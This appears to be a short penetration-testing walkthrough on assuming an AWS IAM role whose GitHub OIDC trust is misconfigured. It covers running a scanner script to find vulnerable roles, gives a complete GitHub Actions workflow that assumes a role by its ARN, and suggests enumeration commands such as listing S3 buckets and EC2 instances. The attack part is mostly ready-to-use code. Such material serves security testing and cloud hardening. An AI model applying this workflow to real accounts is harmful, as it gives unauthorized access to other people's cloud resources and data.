Assuming a Vulnerable GitHub OIDC Trust Role
-
Run the aws-oidc-tester.py Tool
- Use the
aws-oidc-tester.pyscript to identify vulnerable roles configured for GitHub OpenID Connect (OIDC) trust.python3 aws-oidc-tester.py
- Use the
-
Use GitHub to Assume the Vulnerable Role
- Create a GitHub repository and specify a workflow file
.github/workflows/aws.ymlwith the appropriate configuration to leverage the vulnerable role.
- Create a GitHub repository and specify a workflow file
name: Test workflow
on:
push:
branches:
- main # You can specify other branches if needed
permissions:
id-token: write # Required to request the OIDC token
contents: read # Optional, allows reading repository contents
jobs:
test:
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Configure AWS credentials
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: arn:aws:iam::741448947753:role/github # Replace with your IAM role ARN
role-session-name: test
aws-region: us-east-1
- name: AWS command
run: |
aws sts get-caller-identity
- Run Commands as the Assumed Role
- Use the assumed role credentials from the GitHub Actions workflow to execute any desired AWS commands.
- Example:
aws s3 ls
aws ec2 describe-instances
- Example:
- Use the assumed role credentials from the GitHub Actions workflow to execute any desired AWS commands.